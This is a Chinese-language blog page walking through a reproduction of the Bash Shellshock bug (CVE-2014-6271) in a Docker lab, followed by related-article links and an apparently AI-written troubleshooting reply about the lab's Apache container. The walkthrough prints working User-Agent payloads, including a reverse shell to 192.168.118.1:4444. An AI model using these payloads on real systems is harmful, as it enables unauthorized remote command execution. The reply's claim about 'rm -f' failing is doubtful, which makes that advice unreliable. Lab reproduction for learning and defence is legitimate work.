Bash(shellshock)

最新推荐文章于 2024-12-25 21:00:13 发布

原创最新推荐文章于 2024-12-25 21:00:13 发布 · 342 阅读

0 ·

CC 4.0 BY-SA版权

文章标签：

#java #html #http

本文探讨了GNU Bash 4.3以下版本的安全漏洞，涉及如何利用启动服务器和通过抓包技巧执行反弹shell攻击。同时，提供了针对这种漏洞的防御措施和如何检查容器安全的步骤。

影响
漏洞影响：GNU Bash <= 4.3

启动服务器

搭建：docker-compose up -d
查看：docker-compose ps

请添加图片描述
抵达网站

抓包拦截

User-Agent: () { :;};echo ; echo; echo $(/bin/ls /);
反弹shell：User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/192.168.118.1/4444 0>&1;

请添加图片描述

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

chocoMoss

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

[Bash]Shellshock

qq_43801002的博客

04-27

390

#讲在前面对于shellshock漏洞，还是必须要补充一些点的网上对于这个漏洞的复现教程所剩无几，可能是因为破坏力实在太大，且易于实施。 2014 年 9 月 24 日，Bash 惊爆严重安全漏洞，编号为 CVE-2014-6271，该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell，广泛使用在 Linux 系统内，最初的功...

bash(CVE-2014-6271) shellshock-破壳漏洞复现

weixin_45095113的博客

01-03

866

bash(CVE-2014-6271) shellshock-破壳漏洞复现

参与评论您还未登录，请先登录后发表或查看评论

Vulhub-Shellshock Remote Command Injection (CVE-2014-6271)

ad12456的博客

05-18

587

Shellshock远程命令注入

vulhub漏洞复现之bash（Shellshock CVE-2014-6271）

weixin_43071873的博客

11-27

1631

Shellshock 破壳漏洞 CVE-2014-6271 1.漏洞概述： GNU Bash 4.3及之前版本在评估某些构造的环境变量时存在安全漏洞，向环境变量值内的函数定义后添加多余的字符串会触发此漏洞，攻击者可利用此漏洞改变或绕过环境限制，以执行shell命令。某些服务和应用允许未经身份验证的远程攻击者提供环境变量以利用此漏洞。此漏洞源于在调用bash shell之前可以用构造的值创建环境变量。这些变量可以包含代码，在shell被调用后会被立即执行。 2.漏洞影响：GNU Bash <= 4.3

Bash Shellshock CVE-2014-6271

arissa666的博客

07-08

160

配置一下rhost和targrturi。进入msf搜shellshock。配置靶机，创建一个tesh脚本。攻击进入宿主机的shell。

Metasploit漏洞利用系列（七）：MSF渗透测试 - Bash Shellshock（破壳漏洞）实战

2402_86373248的博客

08-20

1357

Shellshock漏洞因其广泛的影响范围和严重的后果，提醒我们保持系统和软件更新的重要性。通过本实战演练，我们不仅学习了如何利用Metasploit Framework测试系统是否存在此类漏洞，同时也强调了防御措施的重要性，如定期更新系统和软件、监控网络安全状况以及实施严格的输入验证等。一旦目标系统上的bash shell执行了我们的恶意代码，将会在攻击机上建立一个反向bash shell，从而实现对目标的控制。Metasploit提供了一个专门针对Shellshock漏洞的模块，我们使用它来构造攻击。

Bash 破壳漏洞Shellshock (CVE-2014-6271)复现

Makboli的博客

08-23

1863

Bash 破壳漏洞Shellshock (CVE-2014-6271)复现

shellshock 漏洞 bash漏洞rpm包升级包

09-28

研究人员周四发布警告称黑客已经开始利用最新的“Shellshock”电脑漏洞借助蠕虫病毒扫描有漏洞的系统然后感染这些 redhat 6 5以上版本32 位64位升级包

Bash Shellshock CVE-2014-6271 漏洞复现

weixin_43144118的博客

11-11

512

Bash Shellshock CVE-2014-6271 漏洞复现 Bash介绍 Bourne Again Shell（简称BASH）是在GNU/Linux上最流行的SHELL实现，于1980年诞生，经过了几十年的进化从一个简单的终端命令行解释器演变成了和GNU系统深度整合的多功能接口。根据维基百科的描述：Bash，Unix shell的一种。1989年发布第一个正式版本，原先是计划用在GNU...

Bash Shellshock(Bash远程代码执行)漏洞分析及利用思路

热门推荐

Exploit的小站~

05-10

3万+

今日爆出一个Bash的RCE漏洞，威力巨大。看了看老外的分析，觉得有必要写一写自己对这个漏洞的理解。首先，问题起因于一个命令ENV。原型： env [OPTION]... [NAME=VALUE]... [COMMAND [ARGS]...] Man是这么说的： Display, set, or remove environment variables,Run a comm...

Bash Bug（破壳漏洞，Shellshock） - CVE-2014-6271

HaSaKing的博客

05-28

1323

破壳漏洞是对全球数以百万计的系统构成威胁的严重安全漏洞。通过理解其原理并学习如何检测和修补，您可以显著提高自己系统的安全性。始终保持系统和软件的最新状态是保护自己免受此类漏洞攻击的关键策略。

bash漏洞（shellshock）详细描述及解决方案

weixin_33860528的博客

09-30

334

RedHat有关bash代码注入漏洞（又叫Shellshock漏洞）的详细描述及解决方案如下：https://access.redhat.com/articles/1200223 转载于:https://blog.51cto.com/dangzhiqiang/1559652...

Bash ShellShock 解决办法

a1895024的博客

10-13

509

2014 年 9 月 24 日，Bash 惊爆严重安全漏洞，编号为 CVE-2014-6271，该漏洞将导致远程攻击者在受影响的系统上执行任意代码。GNU Bash 是一个为 GNU 计划编写的 Unix Shell，广泛使用在 Linux 系统内，最初的功能仅是一个简单的基于终端的命令解释器。这意味全球至少 150 万的主机将受到影响，此外 Linux/Unix 世界内的安...

Linux超级Bash漏洞（Shellshock）修复方法，内附Debian服务器详细方法

tiankongxiaya的专栏

09-29

968

近日，Linux社区爆出了关于Linux Bash的安全漏洞，该漏洞源于你调用的bash shell之前创建的特殊的环境变量，这些变量可以包含代码，同时会被bash执行。不同于之前的SSL的HeartBlood漏洞，这个Bash漏洞能让黑客通过嵌入恶意命令完全控制目标机器，而不像HeartBlood只是可以嗅探敏感信息。对于所有安装GNU bash 版本小于或者等于4.3的Linux操作系统

Shellshock Lab

Yuhan2001的优快云博客

12-05

4479

软件安全课程实验二shellshock；版本：SeedUbuntu20.04；课本：计算机安全导论：深度实践；

ShellShock攻击模拟与防御实验包

weixin_42584507的博客

10-26

878

本文还有配套的精品资源，点击获取简介：ShellShock攻击利用Unix/Linux系统中的Bash shell处理环境变量的漏洞，可导致远程代码执行和系统权限提升。本实验包包含源码和设计说明书，旨在帮助理解ShellShock攻击原理并实践复现。通过实验，学习如何防御此类攻击、进行安全编程以及安全审计。实验强调在受控环境下操作，以避免对生产系统造成风险。 1...

ShellShock（破壳漏洞）的简单分析

爱唠叨的老鱼

09-27

1万+

（1)什么是ShellShock？（2）ShellShock漏洞的原理。（3）ShellShock漏洞的危害。（4）如何修复ShellShock漏洞。

Shellshock （bash之门）远程代码执行漏洞

Blanks的博客

12-25

1244

最近在打靶的时候才了解到这一个**漏洞**，其针对一些靶机**版本比较老**的机器特别好用，毕竟是一个Shell的**远程代码执行**，如果能直接反弹Shell就省去了更多的时间。

详解ShellShock 漏洞复现原理，内附ShellShock的修复方法

Anprou的博客

05-31

7131

Shellshock的原理是利用了Bash在导入环境变量函数时候的漏洞，启动Bash的时候，它不但会导入这个函数，而且也会把函数定义后面的命令执行。

root@zzz-virtual-machine:/home/11/Chapter4/实战12 Shell shock 漏洞（CVE-2014-6271）# docker exec -it 12shellshockcve-2014-6271-web-1 ps aux | grep apache root@zzz-virtual-machine:/home/11/Chapter4/实战12 Shell shock 漏洞（CVE-2014-6271）# docker exec -it 12shellshockcve-2014-6271-web-1 netstat -tuln | grep :80 root@zzz-virtual-machine:/home/11/Chapter4/实战12 Shell shock 漏洞（CVE-2014-6271）# cat victim.cgi #!/usr/local/bash-4.3.0/bin/bash echo "Content-type: text/html" echo "" echo '<html>' echo '<head>' echo '<meta http-equiv="Content-Type" content="text/html; charset=utf-8">' echo '<title>Bash ShellShock</title>' echo '</head>' echo '<body>' echo '<p>' echo 'Hello world' echo '</p>' echo '</body>' echo '</html>' exit 0root@zzz-virtual-machine:/home/11/Chapter4/实战12 Shell shock 漏洞（CVE-2014-6271）# \curl --noproxy '*' -v http://127.0.0.1/cgi-bin/victim.cgi * Trying 127.0.0.1:80... * Connected to 127.0.0.1 (127.0.0.1) port 80 (#0) > GET /cgi-bin/victim.cgi HTTP/1.1 > Host: 127.0.0.1 > User-Agent: curl/7.81.0 > Accept: */* > * Mark bundle as not supporting multiuse < HTTP/1.1 404 Not Found < Date: Mon, 01 Dec 2025 06:42:26 GMT < Server: Apache/2.4.10 (Debian) < Content-Length: 291 < Content-Type: text/html; charset=iso-8859-1 < <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>404 Not Found</title> </head><body> <h1>Not Found</h1> <p>The requested URL /cgi-bin/victim.cgi was not found on this server.</p> <hr> <address>Apache/2.4.10 (Debian) Server at 127.0.0.1 Port 80</address> </body></html> * Connection #0 to host 127.0.0.1 left intact root@zzz-virtual-machine:/home/11/Chapter4/实战12 Shell shock 漏洞（CVE-2014-6271）#

最新发布

12-02

普通文本型问题，直接回答如下：您已提供了完整的诊断信息，我们来**逐条分析**： --- ### ✅ 您执行的命令及输出： #### 1. 查看 Apache 进程 ```bash docker exec -it 12shellshockcve-2014-6271-web-1 ps aux | grep apache ``` 👉 **无输出** #### 2. 查看 80 端口监听 ```bash docker exec -it 12shellshockcve-2014-6271-web-1 netstat -tuln | grep :80 ``` 👉 **无输出** #### 3. 查看 `victim.cgi` 内容 ```bash cat victim.cgi ``` ✅ 内容完整，Shebang 正确： ```bash #!/usr/local/bash-4.3.0/bin/bash ``` 脚本逻辑也正确，结尾有 `exit 0` #### 4. 测试访问 ```bash \curl --noproxy '*' -v http://127.0.0.1/cgi-bin/victim.cgi ``` 返回： ``` HTTP/1.1 404 Not Found The requested URL /cgi-bin/victim.cgi was not found on this server. ``` --- ## 🔍 根本结论：**Apache 服务根本没有启动！** 尽管容器在运行，但： > ❌ `apache2ctl -DFOREGROUND` 没有成功执行 > ❌ 导致 Apache 未监听 80 端口 > ❌ 所有 CGI 请求返回 `404 Not Found` 这就是为什么无论你怎么访问都是失败的。 --- ## 🚨 问题根源：`command` 中的 `rm -f /var/run/apache2/apache2.pid` 失败导致 Apache 启动中断这是 Vulhub 镜像中一个经典陷阱。 ### 原因分析：您 `docker-compose.yml` 中的 `command` 是： ```yaml command: > bash -c " rm -f /var/run/apache2/apache2.pid && echo 'Starting Apache in foreground...' && apache2ctl -DFOREGROUND " ``` 问题出在： - 第一次运行时，`/var/run/apache2/` 目录 **不存在** - 所以 `rm -f` 命令其实失败了（虽然 `-f` 会忽略“文件不存在”，但如果目录都不存在，某些系统仍会报错） - 但由于使用了 `&&`，前面命令失败 → 后面 `apache2ctl` **不会执行** - 结果：**Apache 根本没启动** --- ## ✅ 解决方案：改用 `|| true` 避免中断修改 `docker-compose.yml` 中的 `command`： ```yaml command: > bash -c " mkdir -p /var/run/apache2 && rm -f /var/run/apache2/apache2.pid || true && echo 'Starting Apache in foreground...' && apache2ctl -DFOREGROUND " ``` 或更简洁安全的方式： ```yaml command: > bash -c " mkdir -p /var/run/apache2 && (rm -f /var/run/apache2/apache2.pid || true) && apache2ctl -DFOREGROUND " ``` > ✅ 关键改进： > - `mkdir -p /var/run/apache2` 确保目录存在 > - `|| true` 保证即使 `rm` 失败，整体命令也视为成功，继续执行 --- ## 🔁 修复步骤 ### 1. 编辑 `docker-compose.yml` ```bash nano docker-compose.yml ``` 将 `command` 替换为： ```yaml command: > bash -c " mkdir -p /var/run/apache2 && rm -f /var/run/apache2/apache2.pid || true && echo 'Starting Apache in foreground...' && apache2ctl -DFOREGROUND " ``` ### 2. 重启容器 ```bash docker-compose down docker-compose up -d ``` ### 3. 验证 Apache 是否启动 ```bash docker exec -it 12shellshockcve-2014-6271-web-1 ps aux | grep apache ``` ✅ 应看到： ```text /usr/sbin/apache2 -DFOREGROUND ``` ### 4. 验证端口监听 ```bash docker exec -it 12shellshockcve-2014-6271-web-1 netstat -tuln | grep :80 ``` ✅ 应看到： ```text tcp6 0 0 :::80 :::* LISTEN ``` ### 5. 再次测试访问 ```bash \curl --noproxy '*' http://127.0.0.1/cgi-bin/victim.cgi ``` ✅ 此时应返回完整的 HTML 页面，包含： ```html <p>Hello world</p> ``` --- ## 📌 总结 | 问题 | 原因 | 解法 | |------|------|------| | Apache 未启动 | `rm -f` 失败导致 `&&` 中断 | 改用 `|| true` | | 404 Not Found | Web 服务未运行 | 修复启动脚本 | | `victim.cgi` 无法访问 | 不是路径问题，是服务没起来 | 先让 Apache 跑起来 | --- 🎯 **现在请您立即修改 `docker-compose.yml` 中的 `command`，加入 `mkdir -p` 和 `|| true`，然后重启容器。** 只要这一步完成，Apache 就会正常启动，您就能成功访问 `/cgi-bin/victim.cgi` 并看到 “Hello world” 回显。